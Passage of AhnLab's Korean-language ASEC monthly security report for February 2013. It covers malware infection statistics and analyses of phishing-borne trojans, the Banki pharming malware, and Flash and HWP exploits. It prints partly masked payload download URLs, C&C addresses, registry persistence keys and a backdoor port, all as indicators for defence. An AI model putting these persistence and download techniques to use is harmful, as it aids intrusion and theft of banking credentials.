ASEC REPORT VOL.38 2013.03 안랩월간보안보고서 2013 년 2 월의보안동향
CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴 (www.ahnlab.com) 에서확인하실수있습니다. I. 2013년 2월의보안동향악성코드동향 01. 악성코드통계 03-2월악성코드, 전월대비 289만여건감소 - 악성코드대표진단명감염보고최다 20-2월최다신종악성코드 Win-Trojan/Agent.98375-2월악성코드유형트로이목마가최다 - 악성코드유형별감염보고전월비교 - 신종악성코드유형별분포 02. 악성코드이슈 07 - 통신사요금청구서로위장해유포되는악성코드 - 개인신용상담신청했다가계좌정보털린다 - 온라인뱅킹노리는 Banki 변종지속발견 - 백신피해변신하는악성코드주의! - CVE-2012-0158 취약점악용문서첨부메일주의 - CVE-2013-0634 취약점을통해유포되는악성코드 - HWP 제로데이취약점을가진문서파일발견 - 터키항공사예약확인안내메일로위장해유포되는악성이메일 - 미국우체국 (USPS) 으로위장해유포되는악성이메일 - 카카오게임 윈드러너 고득점비결로유인해 PUP 배포 - 네트워크트래픽발생악성코드 보안동향 01. 보안통계 25-2월마이크로소프트보안업데이트현황 02. 보안이슈 26 - IE SLayoutRun UAF 취약점 (CVE-2013-0025) - NBC.com 을통한악성코드전파 - 리눅스기반의 SSHD 루트킷웹보안동향 01. 웹보안통계 28 - 웹사이트악성코드동향 - 월별악성코드배포 URL 차단건수 - 월별악성코드유형 - 월별악성코드가발견된도메인 - 월별악성코드가발견된 URL - 악성코드유형별배포수 - 악성코드배포순위 02. 웹보안이슈 31-2013년 2월침해사이트현황 - 침해사이트를통해서유포된악성코드최다 10건 03. 모바일악성코드이슈 19-2012년모바일악성코드동향 - 플레이스토어를통한악성코드배포 - 발렌타인데이를겨냥한안드로이드악성앱 - 체스트악성앱으로유출된개인정보를이용한스마트폰타깃공격
3 01 악성코드동향 악성코드통계 2월악성코드, 전월대비 289만여건감소 ASEC이집계한바에따르면, 2013 년 2월에감염이보고된악성코드 15,000,000 10,000,000 9,938,154 0.4% -336,125 9,602,029 3.4% -2,893,199 6,708,830 30.1% 는 670만 8830건인것으로나타났다. 이는전월 960만 2029건에비 5,000,000 해 289만 3199건, 약 30% 가감소한수치다 ([ 그림 1-1]). 이같은감소는 2월명절연휴와짧은일수등이반영된것으로분석된다. 이중에서가장많이보고된악성코드는 ASD. PREVENTION이었으며, Malware/ Win32.suspicious, Textimage/ Autorun이다음으로많았다. 또한총 8건의악성코드가최다 20건목록에새로이름을올렸다 ([ 표 1-1]). 0 12 01 02 그림 1-1 월별악성코드감염보고건수변화추이 순위 등락 악성코드명 건수 비율 1 ASD.PREVENTION 352,546 18.1 % 2 Malware/Win32.suspicious 218,280 11.2 % 3 1 Textimage/Autorun 181,703 9.3 % 4 NEW Win-Trojan/Agent.98375 106,049 5.4 % 5 2 Trojan/Win32.agent 96,758 5.0 % 6 Trojan/Win32.Gen 89,790 4.6 % 7 NEW Adware/Win32.winagir 89,201 4.6 % 8 NEW Win-Trojan/Downloader.220672.Q 80,065 4.1 % 9 Trojan/Win32.onlinegamehack 79,326 4.1 % 10 5 Trojan/Win32.adh 73,347 3.8 % 11 2 RIPPER 72,933 3.7 % 12 NEW Win-Trojan/Agent.204552 69,238 3.6 % 13 NEW Trojan/Win32.urelas 64,051 3.3 % 14 2 Adware/Win32.korad 61,338 3.1 % 15 7 Trojan/Win32.onlinegames 58,303 3.0 % 16 NEW Win-Trojan/Agent.168000 56,064 2.9 % 17 NEW Win32/Virut.f 55,008 2.8 % 18 2 Malware/Win32.generic 50,768 2.6 % 19 16 JS/Agent 49,363 2.5 % 20 NEW Win-Trojan/Korad.82800 45,665 2.3 % TOTAL 1,949,796 100.0 % 표 1-1 2013년 2월악성코드최다 20건 ( 감염보고, 악성코드명기준 )
4 악성코드대표진단명감염보고최다 20 [ 표 1-2] 는악성코드별변종을종합한악성코드대표진단명중가장많이보고된 20건을추린것이다. 2013년 2월에는 Win-Trojan/Agent 가총 76만 6940건으로가장빈번히보고된것으로조사됐다. Trojan/ Win32가 74만 3444건, Win-Trojan/ Onlinegamehack이 49만 5702건으로그뒤를이었다. 순위 등락 악성코드명 건수 비율 1 1 Win-Trojan/Agent 766,940 16.5 % 2 1 Trojan/Win32 743,444 16.1 % 3 Win-Trojan/Onlinegamehack 495,702 10.7 % 4 ASD 352,546 7.6 % 5 6 Win-Trojan/Korad 291,457 6.3 % 6 1 Malware/Win32 286,247 6.2 % 7 3 Win-Trojan/Downloader 234,261 5.1 % 8 Adware/Win32 228,025 4.9 % 9 Textimage/Autorun 181,720 3.9 % 10 3 Win-Adware/Korad 146,045 3.2 % 11 1 Win-Trojan/Avkiller 125,620 2.7 % 12 2 Win32/Virut 117,697 2.5 % 13 7 Win-Trojan/Urelas 104,430 2.3 % 14 2 Win32/Conficker 94,058 2.0 % 15 3 Win-Dropper/Korad 91,608 2.0 % 16 1 Downloader/Win32 89,390 1.9 % 17 NEW Win32/Autorun.worm 79,291 1.7 % 18 2 RIPPER 72,933 1.6 % 19 Win32/Kido 71,478 1.5 % 20 NEW Backdoor/Win32 61,745 1.3 % TOTAL 4,634,637 100.0 % 표 1-2 악성코드대표진단명최다 20건 2월최다신종악성코드 Win-Trojan/Agent.98375 [ 표 1-3] 은 2월에신규로접수된악성코드중감염보고가가장많았던 20건을꼽은것이다. 2월의신종악성코드는 Win-Trojan/Agent.98375 가 10만 6049건으로전체 17.7% 를차지했으며, Win-Trojan/ Downloader.969624 가 6만 8339건이보고돼 13.4% 를차지했다. 순위 악성코드명 건수 비율 1 Win-Trojan/Agent.98375 106,049 17.7 % 2 Win-Trojan/Downloader.220672.Q 80,065 13.4 % 3 Win-Trojan/Agent.204552 69,238 11.4 % 4 Win-Trojan/Onlinegamehack.282624.X 36,485 6.1 % 5 Win-Trojan/Korad.85504.B 26,070 4.4 % 6 Win-Trojan/Agent.204208 25,863 4.3 % 7 Win-Trojan/Korad.75264 24,076 4.0 % 8 Win-Trojan/Avkiller.30272 23,098 3.9 % 9 Win-Trojan/Agent.204692 21,757 3.6 % 10 Win-Trojan/Avkiller.29984 20,890 3.5 % 11 Win-Trojan/Korad.75264.B 20,367 3.4 % 12 Win-Trojan/Korad.200704 19,513 3.3 % 13 Win-Trojan/Korad.90112 18,382 3.1 % 14 Win-Trojan/Onlinegamehack.272896.F 17,685 3.0 % 15 Win-Trojan/Startpage.143352 16,918 2.8 % 16 Win-Adware/KorAd.656600 16,669 2.8 % 17 Win-Trojan/Killav.4554752 15,672 2.6 % 18 Win-Trojan/Onlinegamehack.136331 14,342 2.4 % 19 Win-Trojan/Agent.248320.BL 13,245 2.2 % 20 Win-Trojan/Onlinegamehack.180736.Q 12,483 2.1 % TOTAL 598,867 100.0 % 표 1-3 1월신종악성코드최다 20건
5 2월악성코드유형트로이목마가최다 [ 그림 1-2] 는 2013년 2월 1개월간안랩고객으로부터감염이보고된악성코드의유형별비율을집계한결과다. 트로이목마 (Trojan) 가 54.7% 로가장높은비율을나타냈고웜 (Worm) 이 5.4%, 스크립트 (Script) 가 4.1% 로집계됐다. 그림 1-2 악성코드유형별비율 악성코드유형별감염보고전월비교 [ 그림 1-3] 은악성코드유형별감염비율을전월과비교한것이다. 트로이목마, 웜, 바이러스, 애드웨어는전월에비해증가세를보였으며스크립트, 드롭퍼는감소했다. 스파이웨어, 다운로더, 애프케어계열들은전월수준을유지했다. 그림 1-3 2012 년 01 월 vs. 2013 년 02 월악성코드유형별비율
6 신종악성코드유형별분포 2월의신종악성코드를유형별로살펴보면트로이목마가 84% 로가장많았고, 드롭퍼가 5%, 애드웨어가 8% 로집계됐다. 그림 1-4 신종악성코드유형별분포
7 02 악성코드동향 악성코드이슈 통신사요금청구서로위장해유포되는악성코드요즘통신사의요금청구서를이메일로받는사람들이점점많아지면서이를이용해사용자들에게메일로유포하는악성코드가발견됐다. 이에사용자들의주의가필요하다. 해당악성코드실행시, 자기자신을 C:\Windows\2BCB0FF5\ 폴더에 svchsot.exe라는이름으로이동시킨다. 또한아래의그림과같이레지스트리 Run 키에등록하여윈도우시작시에자동으로실행되도록한다. 또한 At1.job ~ At24.job 파일을 tasks 폴더밑에생성해매일, 매시간마다실행하도록한다. 그림 1-5 유포되는이메일위의그림과같이 e-메일요금청구서 라는제목으로유포되며, 메일안에는청구서를위장한악성코드가첨부돼있다. 첨부된파일을실행한정보는 [ 그림 1-6] 과같다. 그림 1-7 악성코드실행시, 레지스트리정보 추가로 [ 그림 1-8] 과같이 hosts 파일을변조하며, 키로거기능도확인이됐다. 네트워크에대한연결정보도 [ 그림 1-9] 와같이확인됐다. 그림 1-8 hosts 파일정보및키로깅시, 생성되는파일 그림 1-9 IP : 2**.0.1**.** : ***1 에대한네트워크접근정보 <V3 제품군의진단명 > Win-Trojan/Magania.115200.CZ 개인신용상담신청했다가계좌정보털린다. 그림 1-6 악성코드실행시, 파일생성정보 사용자의온라인뱅킹정보를탈취하는악성코드로인한계좌정보유
8 출피해사례가연일이슈가되고있다. 악성코드유포목적으로해킹된사이트들관찰한결과그중에한곳인개인신용상담사이트에서지속적으로다양한형태의악성코드 ( 온라인게임핵, DDoS, 백도어, Banki 등 ) 를유포해온것으로나타났다. 해당사이트가 2013년 1월부터지금까지유포한악성코드중 Banki는 [ 그림 1-10] 과같다. 사용해온라인뱅킹사이트로접속할경우실제사이트가아닌피싱사이트로접속된다. 그림 1-12 악성코드에의해서변조된 hosts 그림 1-10 개인신용상담사이트의 Banki 악성코드유포이력 2013년 02월 20일에도해당사이트를통해서 banki 악성코드가유포됐으며, 해당사이트의 http://www.****.com/pasan/js/member_ new02.js 에는아래와같은난독화된스크립트코드가삽입돼있었다. - 보안프로그램강제종료 : Rstray.exe, KSafeTray.exe - 특정사이트접속 : 173.***.53.62:2012, 173.***.53.61:2012, 173.***.53.60:2012 - 시스템정보수집 : 운영체제버전, CPU 사양등 - 키보드키로깅 : 입력된내용을키로깅한후 %SYSTEM%\ C4C37467.key에암호화 (XOR) 그림 1-11 개인신용상담사이트에삽입된스크립트코드위난독화된코드를풀어보면최종적으로 http://www.*******. co.kr/psd/mk/mk.html 을받아와서실행하도록돼있다. 해킹된개인신용상담사이트에접속한 PC에만약아래와같은취약점이존재하면 Banki에감염된다. webios.dll 파일과 wdiguest.dll 파일은동일한파일이며, webios.dll 파일은 svchost.exe 프로세스에로드되어동작하며, 미국에위치하는 C&C 서버로주기적으로접속을시도하는것으로확인됐다. - 자바취약점 : CVE-2012-0507 / CVE-2012-1723 / CVE- 2012-5076 / CVE-2012-4681 / CVE-2011-3544 / CVE-2013-0422 - Internet Explorer 취약점 : CVE-2012-1889 이번에발견된 Banki는다음과같은기능이있다. 1. 호스트파일변조아래정보를사용해호스트파일을변조한다. 사용자가감염된 PC를 그림 1-13 키로깅해저장된데이터 <V3 제품군의진단명 > Trojan/Win32.Magania(2013.02.20.00) 온라인뱅킹노리는 Banki 변종지속발견국내온라인뱅킹사용자의보안카드등의계정정보를노리는 Banki 악성코드의변종이지속적으로발견되고있다. Banki 악성코드는주로악성스크립트가삽입된웹사이트를통해감염된다. 이악성코드에감염되면 hosts 파일을변경해정상적인뱅킹사이트에접속시도할때, 악성코드제작자가만든가짜뱅킹사이트에접속되도록만들어사용자정보를입력하도록유도하고그정보를탈취한다. Banki에대한이전정보는 ASEC 블로그 주민번호체크하는파밍사이트 ( http://asec.ahnlab.com/search/banki ) 를통해확인할수있다.
9 이번에발견된변종역시악성스크립트가삽입된사이트를통해감염되며, 중국어를사용하는웹서버에접근해추가악성코드를다운받아실행한다. 그림 1-17 수정된 hosts 파일 그림 1-14 악성프로그램유포사이트특이한점은해당악성프로그램은 V3의아이콘을사용하면서, 리소스정보에는국내 E사의정보를사용하고있다는점이다. 그림 1-15 V3 의아이콘을사용하는악성프로그램 [ 그림 1-17] 과같이 hosts 파일이수정되면위목록의뱅킹사이트들에접근할때좌측의 IP로연결되게되는데, 이 IP가바로악성코드제작자가만든피싱사이트다. 그러나현재는해당 IP가막혀있어접근이되지않는다. 또한, 악성파일은아래의경로에파일을하나생성하는데, 이는악성코드의버전정보로추정된다. - C:\Program Files\Windows Media Player\player.ini 그림 1-18 악성코드버전정보로추정되는파일 또한악성코드는 C&C 서버에지속적으로접근한다. 그림 1-19 네트워크접근정보 그림 1-16 특정제품의리소스정보로위장된악성프로그램 <V3 제품군의진단명 > Trojan/Win32.Xema Win-Trojan/Agent.56832.JJ Hosts.exe 가실행되면, PC 의 hosts 파일을아래와같이수정한다.
10 백신피해변신하는악성코드주의! 백신의탐지를피하기위해수시로모습을바꾸는온라인게임핵악성코드가발견됐다. 이악성코드는사용자의계정을탈취해, 추가적인피해를일으키는데, 백신이이를지속적으로추적및탐지하자변신을시도한것으로보인다. 으로 BHO (Browser Helper Objects) 로등록된다. 기존에는 kakubi.dll 이라는이름으로유포되어왔으나, kakuzi.dll로변경된것을확인할수있다. 이또한백신제품의탐지를우회하기위한것이다. 그림 1-23 BHO로등록된 kakuzi.dll 악성코드파일 그리고악성코드에감염되면 [ 그림 1-24] 와같이시스템정보를전송하는기능을포함하고있다. 그림 1-24 악성코드최초감염시특정서버로연결및시스템정보전송 그림 1-20 일반적인온라인게임핵악성코드감염과정 해당 IP로접속하는서버는 [ 그림 1-25] 와같이워싱턴 D.C에위치하는것을확인할수있다. 일반적으로온라인게임핵악성코드는대부분 [ 그림 1-20] 과같은경로로감염된다. 특히악성코드가감염되는부분에서악성코드의변신이일어난다. 물론악성코드의탐지를우회하기위한목적이다. 전통적인온라인게임감염대상은 ws2help.dll, imm32.dll, usp.dll, wshtcpip.dll, midimap.dll 등과같은시스템구성파일을교체하는형태였다. 최근에는이러한전통적인형태에 kakubi.dll 이라는파일이추가로감염되어백신제품에서탐지하고치료하는과정을방해하는방향으로발전했다. 그런데, 추가된 kakubi.dll 파일이최근대부분의백신제품에의해탐지되자, 파일명을바꿔서유포하기시작한것이다. 해당악성코드에감염되면 [ 그림 1-21] 과같이 AV-Kill 악성코드가서비스항목에장치드라이버로등록되어감염된다. 그림 1-21 파일드라이버로등록된 AV-Kill 악성코드 그림 1-25 악성코드가통신하는원격시스템위치얼마전 게임산업진흥에관한법률시행령 개정으로인해게임아이템거래에타격을입게되자, 인터넷뱅킹의계좌정보를직접탈취해현금을빼내가는파밍기법이기승을부리고있다. 온라인게임핵이유포되던기존침해사이트들도최근에는상당수가파밍악성코드를유포하지만, 온라인게임핵악성코드가완전히사라지지않은만큼사용자들의각별한주의가요구된다. 드라이버파일이등록되어백신제품의동작을방해한다음, [ 그림 1-22] 와같이윈도우운영체제의정상시스템구성파일을악성으로교체한다. wshtcpip.dll 파일이그대상이며, 정상파일은 wshtcpzi.dll 파일로백업된다. <V3 제품군의진단명 > Win-Trojan/Onlinegamehack.213504.B (2013.02.18.01) Win-Trojan/Avkiller.32288 (2013.02.18.01) Win-Trojan/Onlinegamehack.229888.C (2013.02.18.01) Win-Trojan/Onlinegamehack.289792.J (2013.02.19.00) Trojan/Win32.KillAV (2013.02.20.00) 그림 1-22 악성코드로교체된 wshtcpip.dll 파일 또한 [ 그림 1-23] 과같이인터넷익스플로러에 kakuzi.dll 이라는이름
11 CVE-2012-0158 취약점악용문서첨부메일주국내의기업에서메일을통해윈도우공용컨트롤취약점 (CVE- 2012-0158) 을악용한문서파일이첨부, 유포된사례가발견됐다. 참고로, CVE-2012-0158취약점의경우 Microsoft Security Bulletin MS12-027 - 긴급, Windows 공용컨트롤취약점으로인한원격코드실행문제점 (2664258) 을통해이미보안패치가배포중이다. [ 그림 1-26] 은수신된메일의원문으로, 원고청탁입니다2013. doc 파일이첨부돼있다. 첨부된문서파일은원고청탁과관련된제목으로메일본문에는해당첨부파일에대한참고를요청하는내용이다. - C:\Documents and Settings\All Users\Application Data\ mspool.dll 그리고아래와같이윈도우정상서비스인것처럼레지스트리에등록해, 시스템시작시재실행될수있도록한다. [ 레지스트리생성 ] - HKLM\SYSTEM\ControlSet001\Services\mspool\ ImagePath "%SystemRoot%\system32\svchost.exe -k LocalService" - HKLM\SYSTEM\ControlSet001\Services\mspool\ DisplayName "mspool" - HKLM\SYSTEM\ControlSet001\Services\mspool\ Description "Windows mspool service." - HKLM\SYSTEM\ControlSet001\Services\mspool\ Parameters\ServiceDll "C:\Documents and Settings\All Users\Application Data\mspool.DLL" 악성코드감염시주요기능은다음과같다. - 사용자계정비밀번호탈취시도 (Outlook, IE, 크롬 ) - 시스템정보유출시도 (OS, CPU 정보, 디스크정보등 ) 해당문서는기존의알려진취약점을악용하고있으므로, 사용하는운영체제및주요응용프로그램에대한보안패치를주기적으로설치하는것이중요하다. 그림 1-26 수신된메일원문취약점 (CVE-2012-0158) 이존재하는시스템에서해당문서를실행할경우, 관련된내용의문서가실제로출력되어사용자는의심없이첨부된문서를확인하게된다. 동시에사용자모르게악성코드도함께실행되어사용자의시스템이감염된다. 또한발신인이명확하지않거나, 확인되지않는메일내용또는파일이첨부된이메일을수신할때는각별한주의가필요하다. <V3 제품군의진단명 > DOC/Exploit (2013.02.21.00) Backdoor/Win32.Etso (2013.02.21.01) CVE-2013-0634 취약점을통해유포되는악성코드 최근어도비 (Adobe) 는어도비플래쉬플레이어 (Adobe Flash Player) 에존재하는취약점인 CVE-2013-0633 과 CVE-2013-0634의보안패치를배포했다. 해당취약점은기존에알려지지않은제로데이 (Zero- Day) 취약점으로, 최근해킹된웹사이트를통해이를악용한악성플래시파일 (SWF) 을유포한사례가발견됐다. 그림 1-27 실행되는정상문서파일 [ASEC 블로그 ] - 어도비플래쉬플레이어 CVE-2013-0633 및 CVE-2013-0634 취약점악용 http://asec.ahnlab.com/912 문서파일실행과동시에다음과같이악성파일이생성된다. [ 파일생성 ]
12 참고로유포된사이트는본 ASEC Report Vol. 38에서 개인신용상담신청했다가계좌정보털린다 이슈와동일하지만, 이전과는다른취약점으로유포된다는점에서사용자들의주의가필요해그내용을공유하고자한다. 만일시스템에해당취약점이존재할경우에는악성코드가 drop되어실행되며, SWF 파일내에서도 PE가확인된다. 상위악성스크립트인 web.html 을살펴보면, [ 그림 1-28] 과같다. 그림 1-28 난독화된 web.html web.html 에서난독화를풀어보면아래처럼 EuIKqxn6.swf 파일을다운로드한다. 그림 1-29 난독화를해제한 web.html의내용다운로드되는 swf 파일을디컴파일할경우, 아래 [ 그림 1-30] 과같이 exploit 코드인 LadyBoyle 의이름으로액션스크립트가포함돼있는것이확인할수있다. 그림 1-32 SWF 파일내 PE Drop된 PE가실행되면, 아래의 URL에서악성 PE 를다운로드하며해당악성코드는기존에유포되고있는온라인게임핵악성코드와 hosts 파일을변조하는 Banki 악성코드로확인된다. - http://yu.xxxxxx.inxx/aa.exe - OnlineGamehack 악성코드 - http://xx.1xx.1xx.80:8080/v.exe - Banki 악성코드 그림 1-30 LadyBoyle 이름으로포함된액션스크립트이 exploit은 Adobe Flash Player의제한된버전에한해동작하기때문에버전을체크하는부분의코드가존재하며해당코드들은아래 [ 그림 1-31] 에서확인할수있다. 그림 1-33 변조된 hosts 파일 <v3 제품군의진단명 > Trojan/Win32.Gen (AhnLab, 2013.02.24.00) Trojan/Win32.OnlineGameHack (AhnLab, 2013.02.24.00) Trojan/Win32.Qhost (AhnLab, 2013.02.24.00) HWP 제로데이취약점을가진문서파일발견 그림 1-31 윈도우및 Flash Player 버전을확인하는코드 2013년 1월 25일에수도권에위치한대학교의학생개인정보가담긴 HWP 문서에제로데이 (Zero-Day, 0-day) 취약점이발견됐다. 분석당시, 2012년 12월 13일에업데이트된한컴오피스 2010 제품의최신버전 (8.5.8.1316) 에서해당 HWP 문서파일을열경우제로데이취약점을악용, 악성코드가설치되는것으로확인됐다.
13 그림 1-34 한컴오피스자료실게시판 해당문서파일에는아래와같이 105명의개인정보 ( 성명, 학생주소, 전화번호, 핸드폰, 직장명, 직장전화번호, 이메일 ) 가들어있는데, 시 / 도 / 구청, 공단, 경찰서 / 청과같은공공기관과국내유명기업및학교등과같은각계각층의개인정보가포함되어있다. 이메일주소는대부분특정대학교의메일주소로, 해당대학교의직원, 학생들에대한정보로추정된다. 이문서는 1월 16일에작성된문서로이후공격자에의해다양한방법으로유포됐을것으로추정된다. 그림 1-36 Windows Time 서비스등록상태 그림 1-35 HWP 문서내용 제로데이취약점이있는해당문서파일을열경우아래와같이파일생성과레지스트리키를생성하여 w32time.exe 파일이 Windows Time 이름으로서비스에등록되어시스템이시작할때마다자동실행되도록한다. [ 파일생성 ] - C:\Documents and Settings\[ 사용자계정명 ]\Local Settings\Temp\HncUpdate.exe - C:\Documents and Settings\[ 사용자계정명 ]\Local Settings\Temp\~df1.tmp( 임의파일명 ) - C:\Documents and Settings\[ 사용자계정명 ]\Local Settings\Temp\~df2.tmp ( 임의파일명 ) - C:\Documents and Settings\[ 사용자계정명 ]\Local Settings\Temp\~df3.tmp ( 임의파일명 ) - C:\WINDOWS\system32\w32time.exe [ 레지스트리생성 ] - HKEY_LOCAL_MACHINE \SYSTEM\ControlSet001\ Services\w32time\ImagePath "C:\WINDOWS\system32\ w32time.exe -k" 그림 1-37 제로데이 HWP 파일구성도 w32time.exe 파일이실행되면아래 URL에서파일을다운로드받아 PE 파일여부를검사한후실행한다. - hxxp://www.cl*****e.co.kr/upload/design/body_bg.gif - hxxp://m*****r.com/images/titles/menu.gif - hxxp://www.d*****h.com/boards/board_files/adhere.jpg 위 URL의파일은현재 GIF 포맷파일로정상이미지파일이라실행이되지는않지만, 공격자에의해해당파일이다른악성파일로교체된다면키로깅이나백도어가설치될수있으므로주의가필요하다. 한글과컴퓨터는이번에발견된제로데이취약점의해결된버전을 2 월 6일에업데이트해배포하기시작했다. 따라서해당취약점을악용하는악성코드감염을예방하기위해서는 [ 그림 1-38] 과같이한컴자동업데이트나한글과컴퓨터홈페이지에서최신버전으로업데이트가필요하다.
14 그림 1-38 한컴자동업데이트 그림 1-40 위장된터키항공사예약확인안내메일 첨부된파일은 [ 그림 1-41] 과같은형태로, 얼핏보면 PDF확장자를가진문서파일로보여지지만실제는실행파일이다. 그림 1-41 첨부된실행파일 그림 1-39 한컴오피스업데이트공지사항 <V3 제품군의진단명 > HWP/Exploit Dropper/Agent.641024.G Trojan/Win32.Agent Win-Trojan/Agent.181760.HT 그림 1-42 첨부된실행파일 터키항공사예약확인안내메일로위장해유포되는악성이메일 해당파일을실행하면아래와같은행위를한다. 악성코드를감염시키기위한악성코드유포자의행위가참끈질기다. 이번엔터키항공사이메일을위장한악성코드가발견됐다. 국내에서도저가항공티켓을구매하기위해해외항공사를이용하는경우가많다는점에서주의가필요하다. [ 그림 1-40] 과같이 Turkish Airlines Online Ticket 제목의항공권예약안내메일로첨부된파일을실행하도록유도하고있다. 1. 자기복사본을 %windir%\system32\ 폴더내에생성한다. [ 생성되는파일 ] - C:\WINDOWS\system32\WwYNcgC.exe 2. 생성된파일을시작프로그램에자동실행되도록등록한다.
15 [ 생성되는레지스트리 ] - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ WwYNcgC "C:\WINDOWS\system32\WwYNcgC.exe" 3. 아래와같이의심 IP에접속하며해당악성파일이실행된시스템의프로세스정보 ( 프로세스이름, PID) 를전송한다. [ 네트워크정보 ] - svchost.exe HTTP CONNECT 127.0.0.1 => 18*.**.**.**9:80 18*.**.**.**9/f/i.html?n=1&i=F 09AC77F&s=1538CBE&g=125&c=F09AC77F&pl=%5BSys tem%20process%5d;0;0;system;4;0;smss.exe;552;4;csrss. exe;604;552;win 그림 1-44 유포되는이메일 그림 1-43 네트워크연결정보 첨부된파일의압축을해제하면악성실행파일이나오는데, PDF의아이콘과유사해 PDF로착각할수있다. 하지만실행파일 (PE) 이며실행시아래와같이동작한다. 사회공학기법을이용한악성코드의유포사례가많은만큼아래와같은사항을주의해악성코드감염을예방하도록한다. 1. 출처가불분명하거나의심이가는제목일때는메일을열지말고바로삭제한다. 또발신자와제목을비교해정상메일이아닐확률이높으면삭제한다. 2. 사용중인보안프로그램은최신버전으로업데이트하고실시간감시기능을사용한다. 3. 메일에첨부된파일은바로실행하지않고저장한다음보안프로그램으로검사한후실행한다. 4. 본문의의심가거나확인되지않은링크는클릭하지않는다. 5. 포털사이트메일계정을이용할경우스팸메일차단기능을적극활용한다. 그림 1-45 첨부된실행파일 1. C:\document and settings\all users\ 하위에 svchost.exe 로파일을복제 2. Run 레지스트리에 SunJavaUpdateSched 이름으로 svchost. exe 등록및실행 3. Tcp 8000 포트로 CMD셸백도어를열어둔다. <V3 제품군의진단명 > Win-Trojan/Agent.58372.C (V3, 2013.02.21.00) 미국우체국 (USPS) 으로위장해유포되는악성이메일 발신자가미국우체국 (USPS) 인것처럼위장해악성파일을실행하도록유도하는악성스팸메일이확산되고있어주의가필요하다. 악성이메일은 [ 그림 1-44] 와같이우편물이배달되지않았으니우편물을받기위해첨부파일을실행하라라는내용을담아악성파일실행하도록유도하고있다. 만일악성파일이실행되면, PC에 CMD셸백도어를열어두어공격자가 PC를마음대로컨트롤할수있는환경이된다. 그림 1-46 svchost.exe 속성
16 검색결과가가장상위에있는블로그는현재는비공개포스팅으로바뀐상태이지만, 검색당시해당블로그를접속하면 [ 그림 1-50] 와같이 윈드러너버그다운, 윈드러너쿠폰생성기다운 이라는링크를확인할수있었다. 그림 1-47 TCP/8000 으로바인딩된 CMD 셸백도어 그림 1-50 윈드러너쿠폰 / 루비블로그내용 그림 1-48 백도어접속화면 <V3 제품군의진단명 > Win-Trojan/Androm.44544 (V3, 2013.02.19.03) 그림 1-51 블로그링크파일 카카오게임윈드러너고득점비결로유인해 PUP 배포윈드러너는카카오대표게임이다. 최근천만다운로드를돌파하면서그인기를입증하고있다. 윈드러너게임사용자라면한번쯤고득점비결을인터넷으로검색해봤을것이다. 악성코드나불필요한프로그램제작자는이러한심리를이용해악성코드나불필요한프로그램을배포한다. 다운로드받은파일을실행하면 윈드러너버그 및 쿠폰생성기 다운로드프로그램을가장한불필요한프로그램을설치하는것을확인할수있다. 이러한프로그램은게임사용자에게버그를이용한고득점이나무료쿠폰생성기를이용한게임아이템구매로현혹해불필요한프로그램을설치하도록유도하고있었다. 인터넷검색사이트에서 윈드러너 라고검색을하면, 쿠폰, 무료충전, 공략고득점등다양한검색결과를볼수있다. 이중에서불필요한프로그램을배포하는블로그가있어살펴보고자한다. 그림 1-52 윈드러너버그다운로드프로그램화면 그림 1-49 윈드러너인터넷검색결과
17 이러한불필요한프로그램이설치된경우에는바탕화면, 즐겨찾기, 시작프로그램에쇼핑몰바로가기생성과, PC속도향상을가장한허위백신프로그램, 키워드검색도우미등이설치된다. 그림 1-56 바탕화면바로가기 그림 1-53 윈드러너쿠폰생성기다운로드프로그램 그리고실제다운로드되는파일인윈드러너버그.zip, 윈드러너쿠폰생성기.zip 파일은 ZIP포맷의파일이아닌 404 오류 html 파일로다운로드받은파일이서버에존재하지않는것을알수있다. 그림 1-57 IE 바로가기의환경설정 ( 좌 ), 즐겨찾기바로가기 ( 우 ) 그림 1-54 윈드러너버그.zip, 쿠폰생성기.zip 파일내용 다운로드프로그램은 약관에동의함 에기본적으로선택되어있다. 파일전송시작버튼을클릭하면오른쪽하단의프로그램설치안내에해당되는불필요한프로그램이백그라운드로설치되고, 다운로드프로그램상단의 X( 닫기 ) 버튼을클릭하게되면아래와같이종료안내창을확인할수있다. 무의식적으로예 (Y) 를클릭할경우동의절차없이불필요한프로그램이설치된다. 그림 1-58 WINDOWFAST 허위백신 ( 좌 ), 치료를위한결제화면 ( 우 그림 1-55 다운로드프로그램종료팝업 해당다운로드프로그램을자세히보면 프로그램설치안내 부근에스크롤이있어설치되는프로그램목록을확인할수있지만컴퓨터를사용하는일반사용자는별의심없이파일전송시작버튼을클릭하는경우가다반사일것이다. 프로그램명 설명 그림 1-59 인터넷사용시팝업되는사이트 MyIPViewer 쇼핑몰바로가기 윈도우뷰콘 쇼핑몰바로가기 windowfast 가짜백신 keywordyacpop 시스템클리너프로그램 쇼핑바탕화면아이콘 쇼핑몰바로가기 directkeyword2 키워드검색도우미 쇼핑아이콘 쇼핑몰바로가기 윈도우즈탭 키워드검색도우미 signkey 키워드검색도우미 표 1-4 프로그램설치안내목록에해당되는프로그램 이처럼불필요하게설치되는프로그램을 PUP(Potentially Unwanted Program) 라고부른다. 단순뜻풀이로는 잠재적으로원하지않는프로그램 을말하지만, 일반적으로불필요한프로그램을의미한다. 명시적으로사용자동의를받고설치됐지만사용자가인지한프로그램의설치목적과관계가없거나, 불필요한프로그램으로시스템에문제를일으키거나사용자불편을초래할가능성이있는프로그램을말한다.
18 <V3 제품군의진단명 > PUP/Win32.101Alemi (2012.11.15.02) PUP/Win32.Engine (2012.10.30.00) PUP/Win32.Helper (2012.11.06.03) PUP/Win32.ILikeClick (2013.01.02.04) PUP/Win32.PowerBoan (2012.06.26.02) PUP/Win32.SignKey (2012.11.24.00) PUP/Win32.WindowViewCon (2013.01.17.00) Win-PUP/Helper.WindowsPurchaseHelper.2074624 (2012.10.30.00) Win-PUP/Helper.WindowsTab.190976 (2012.11.16.00) Win-PUP/Helper.WindowViewCon.2241024 (2012.11.14.00) Win-PUP/Security.WindowFast.359424 (2013.02.21.00) Win-PUP/Security.WindowFast.76960 (2013.02.19.02) [ 악성코드파일경로 ] - C:\Documents and Settings\ 사용자계정 \Application Data\ update.exe - C:\Windows\system32\cchxm.exe 그림 1-61 서비스에등록된악성코드해당악성코드는보안제품에서탐지되지않기위해 Themida라는패킹툴로패킹되어있으며, 가상환경에서실행되지않도록되어있다. 악성코드감염대상에서가상환경의 